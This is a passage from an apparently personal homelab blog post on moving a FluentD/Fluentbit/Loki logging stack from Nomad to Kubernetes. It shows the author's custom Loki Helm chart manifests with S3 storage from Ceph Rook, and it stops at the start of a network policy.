<p>To gather the logs from all containers in the cluster, as well as the logs from
the host&rsquo;s JournalD instance, I&rsquo;m using <a href="https://www.fluentd.org/">FluentD</a>,
where Fluentbit sends the logs via Fluent&rsquo;s own <a href="https://docs.fluentd.org/input/forward">Forward protocol</a>.
Here, the main task is in parsing the log lines themselves, bringing them all
into some kind of coherent format. This includes things like bringing all the
different ways of defining log levels in line, so I end up only with a few
levels.</p>
<p>FluentD then sends those logs to <a href="https://grafana.com/oss/loki/">Loki</a> for
long-term storage. There I then access them either via Grafana&rsquo;s explore
feature when I&rsquo;m actively looking for something, or via the <a href="https://grafana.com/docs/grafana/latest/panels-visualizations/visualizations/logs/">Log panel</a>:
<figure>
    <img loading="lazy" src="grafana-log-panel.png"
         alt="A screenshot of a Grafana log panel. At the top are two drop-downs. The first one is labeled &#39;Namespace&#39; and shows the value &#39;redis&#43;external-dns&#39;. The second one is labeled &#39;Container&#39; and has the value &#39;All&#39;. Below is a list of log lines. On the left side of each line is a colored indicator showing the line&#39;s severity. Next comes the timestamp, followed by the log line&#39;s labels. These are either &#39;external-dns&#39;/&#39;external-dns or &#39;redis&#39;/&#39;redis&#39; in this screenshot. After that come the log entries themselves, showing individual log elements with a &#39;key=value&#39; syntax. The actual log line content is not important here, as this screenshot is only intended to illustrate the final state of the logging setup."/> <figcaption>
            <p>Example of what the final stage of the setup will look like.</p>
        </figcaption>
</figure>
</p>
<p>I&rsquo;ve got separate dashboards for syslogs from the cluster hosts and the running
apps.</p>
<p>One question you might ask is: Why not use Fluentbit for host logs as well?
The reason, as weird as it might sound, is unification: Not all of my hosts are
running, and will ever run, containers. Examples are my OpenWRT WiFi access point
and my OPNsense router. They both speak the <a href="https://de.wikipedia.org/wiki/Syslog">Syslog protocol</a>,
but don&rsquo;t run containers and aren&rsquo;t part of the k8s cluster. The same goes for my
desktop as well as several other hosts in the Homelab. And I&rsquo;ve found it to make
more sense to standardize on <a href="https://www.syslog-ng.com/">syslog-ng</a> and the
syslog protocol than to run Fluentbit everywhere.</p>
<h2 id="differences-to-nomad-setup">Differences to Nomad setup</h2>
<p>A short note on the difference to what I had before, in Nomad. The basic setup
was the same. With the main difference being that my Nomad cluster runs on
Docker, and I&rsquo;ve been using Docker&rsquo;s <a href="https://docs.docker.com/config/containers/logging/fluentd/">FluentD logging driver</a>.
Instead of writing the logs to a file, this driver supports FluentD&rsquo;s Forward
format and can send directly to the Fluentbit instance, without the diversion
via a file on disk.
In the beginning, I had Nomad/Docker configured in such a way that the first
time a log line touched a disk was when it was written to S3 after being
delivered to Loki. But this had the downside that when Loki, FluentD, Fluentbit
or Grafana were down, I didn&rsquo;t have a convenient way to get at my logs. So I
ended up enabling Nomad&rsquo;s log writing anyway.</p>
<p>I didn&rsquo;t follow the same approach for k8s simply because it seemed that k8s
requires the logs on disk anyway, for e.g. <code>kubectl logs</code> access.</p>
<h1 id="loki-setup">Loki setup</h1>
<p>So let&rsquo;s start with the first component. I started at the top of the stack with
<a href="https://grafana.com/oss/loki/">Loki</a> and worked my way down the stack to
Fluentbit mostly because this way, I could first disable the Nomad deployments
of Loki and FluentD, instead of reconfiguring the Nomad deployments to also
accept logs from k8s just to then switch the deployments off a couple of days
later.</p>
<p>For Loki, I wrote my own Helm chart. Loki <a href="https://grafana.com/docs/loki/latest/setup/install/helm/">does provide Helm charts</a>.
But they have one glaring downside:</p>
<blockquote>
<p>If you set the singleBinary.replicas value to 1, this chart configures Loki to run the all target in a monolithic mode, designed to work with a filesystem storage.</p></blockquote>
<p>See <a href="https://grafana.com/docs/loki/latest/setup/install/helm/install-monolithic/">here</a>.
The Helm chart does not allow using any other form of storage, besides the local
file system, when using a single binary. And I have absolutely no reason to use
the clustered deployment of Loki. But I do want to use S3 for storage, as I find
the &ldquo;just a big lake of data&rdquo; approach of S3 pretty nice, especially for logs.</p>
<p>To begin with, let&rsquo;s look at the values file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">commonLabels</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">port</span>: <span style="color:#ae81ff">3100</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">lokiPath</span>: <span style="color:#e6db74">&#34;/hl-loki&#34;</span>
</span></span></code></pre></div><p>I&rsquo;ve kept this pretty simple, as it&rsquo;s my own chart, I&rsquo;m only using Helm values
for things which I need to reference in multiple different manifests. So this
only contains the port Loki will listen on, my common <code>homelab/part-of</code> label
and the path where some scratch storage will be mounted as a working directory.</p>
<p>Instead of starting with the deployment and going from there, I will start with
all the manifests used in there this time. Let&rsquo;s see whether that improves the
reading flow.</p>
<p>First, the S3 bucket. This bucket will be used as storage for the logs and
the index. I will create it with Ceph Rook&rsquo;s <a href="https://rook.io/docs/rook/latest-release/Storage-Configuration/Object-Storage-RGW/ceph-object-bucket-claim/">Object Bucket Claim</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">objectbucket.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ObjectBucketClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">logs</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">generateBucketName</span>: <span style="color:#ae81ff">logs</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span></code></pre></div><p>This claim will create a bucket in Ceph&rsquo;s RGW S3 implementation and will
generate a set of credentials to access that bucket, in the form of both a
Secret and a ConfigMap. The bucket&rsquo;s name is partially randomly generated, and
in my case, the bucket is called <code>logs-4138cb40-b96c-4526-b47e-f474a4978775</code>.
The secret will be named after the <code>generateBucketName</code>, so in this case it
will just be called <code>logs</code>. It contains the values <code>AWS_ACCESS_KEY_ID</code> and
<code>AWS_SECRET_ACCESS_KEY</code>. This way, when used via the <code>fromEnv</code> functionality
in a Pod spec, it automatically exposes the S3 credentials in the standard ENV
variables.</p>
<p>The ConfigMap generated by the OBC is also called <code>logs</code>. It contains the necessary
config values to configure an application to access the bucket:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">BUCKET_HOST</span>: <span style="color:#ae81ff">rgw-service.ceph-cluster-namespace.svc</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">BUCKET_NAME</span>: <span style="color:#ae81ff">logs-4138cb40-b96c-4526-b47e-f474a4978775</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">BUCKET_PORT</span>: <span style="color:#e6db74">&#34;80&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">BUCKET_REGION</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">BUCKET_SUBREGION</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span></code></pre></div><p>This configuration is then used via environment variables, which are accessed
in the Loki configuration file, which I provide via a ConfigMap:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki-conf</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">loki.yaml</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    target: &#34;all&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    auth_enabled: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    server:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      http_listen_port: {{ .Values.port }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      grpc_server_max_recv_msg_size: 8000000
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      log_format: &#34;json&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    common:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      path_prefix: {{ .Values.lokiPath }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      instance_addr: 127.0.0.1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      storage:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        s3:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          s3forcepathstyle: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          bucketnames: ${BUCKET_NAME}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          endpoint: ${BUCKET_HOST}:${BUCKET_PORT}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          access_key_id: &#34;${AWS_ACCESS_KEY_ID}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          secret_access_key: &#34;${AWS_SECRET_ACCESS_KEY}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          insecure: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ring:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        kvstore:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          store: &#34;inmemory&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    query_range:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      cache_results: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      results_cache:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        cache:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          redis:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            endpoint: redis.redis.svc.cluster.local:6379
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          embedded_cache:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            enabled: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    ingester:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      wal:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        enabled: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      lifecycler:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        ring:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          replication_factor: 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          kvstore:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            store: &#34;inmemory&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    storage_config:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      boltdb_shipper:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        active_index_directory: {{ .Values.lokiPath }}/active_index
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        shared_store: &#34;s3&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        cache_location: {{ .Values.lokiPath }}/shipper_cache
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    chunk_store_config:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      chunk_cache_config:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        redis:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          endpoint: redis.redis.svc.cluster.local:6379
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    schema_config:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      configs:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        - from: 2024-01-01
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          store: boltdb-shipper
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          object_store: s3
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          schema: v12
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          index:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            prefix: index_
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            period: 24h
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    compactor:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      working_directory: {{ .Values.lokiPath }}/compactor/
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      shared_store: s3
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      retention_enabled: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    limits_config:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      reject_old_samples: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      max_entries_limit_per_query: 10000
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      deletion_mode: &#34;filter-and-delete&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      retention_period: 1y</span>
</span></span></code></pre></div><p>Note that the <code>${ENV_VAR_NAME}</code> syntax is a feature of Loki when reading the
configuration file, it doesn&rsquo;t have anything to do with k8s directly.
I will show the CLI option which needs to be handed to Loki later.</p>
<p>I kept this config relatively simple. The <code>common:</code> config defines a couple
of shared components, most importantly the S3 storage. Further, I&rsquo;m also
configuring Redis for caching.</p>
<p>Last, before coming to the Deployment, here&rsquo;s the scratch volume, on my Ceph
SSD pool:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PersistentVolumeClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scratch-volume</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ReadWriteOnce</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">storage</span>: <span style="color:#ae81ff">2Gi</span>
</span></span></code></pre></div><p>This is merely a small workspace for Loki. As long as it gets enough time during
shutdown, it will upload all relevant data to S3.</p>
<p>And now, the Deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>      {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>      {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>      {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">app</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>        {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/config</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">grafana/loki:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-config.expand-env=true&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-config.file={{ .Values.lokiPath }}/conf/loki.yaml&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">envFrom</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">configMapRef</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">logs</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">secretRef</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">logs</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scratch</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: {{ <span style="color:#ae81ff">.Values.lokiPath }}</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: {{ <span style="color:#ae81ff">.Values.lokiPath }}/conf/</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">400Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/ready&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scratch</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">scratch-volume</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki-conf</span>
</span></span></code></pre></div><p>The first config to look at is the <code>Recretate</code> update policy, which is needed
because I&rsquo;m mounting a PVC. With the default <code>Rolling</code> update strategy, the
fresh Pods won&rsquo;t be able to start, because the volume will still be mounted
by the old Pod.</p>
<p>I&rsquo;m also applying an interesting strategy in the Pod&rsquo;s annotations:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">checksum/config</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/config.yaml&#34;) . | sha256sum }}</span>
</span></span></code></pre></div><p>This takes the ConfigMap I showed before, templates it, and then takes the
Hash of the resulting string. As annotations cannot be changed on a running pod,
in contrast to labels, k8s will recreate the pod when that hash changes. This
way, the Pod is automatically recreated when the Loki config changes.</p>
<p>I also mentioned above that a CLI flag needs to be set to have Loki insert
environment variables into the configuration file. This is the <code>-config.expand-env=true</code>
flag.</p>
<p>Finally, I&rsquo;d like to point out the <code>securityContext.fsGroup</code> setting. I did not
have this setting in the beginning, which had the consequence that Loki threw
<code>Permission denied</code> errors when trying to create a couple of directories during
startup. This configuration is always required when mounting PVCs, at least
Ceph PVCs.</p>
<p>I also had to setup a Service and an Ingress, as my Nomad Grafana instance will
need to access Loki until I&rsquo;ve moved it over to k8s as well. I only
show the manifests here for completeness&rsquo; sake:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">ClusterIP</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki-http</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">loki-http</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">IngressRoute</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#e6db74">&#34;logs.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/target</span>: <span style="color:#e6db74">&#34;ingress.example.com&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">routes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Rule</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">match</span>: <span style="color:#ae81ff">Host(`logs.example.com`)</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">port</span>: <span style="color:#ae81ff">loki-http</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">http</span>
</span></span></code></pre></div><p>I&rsquo;ve also configured a CiliumNetworkPolicy for the Namespace, which looks like
this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
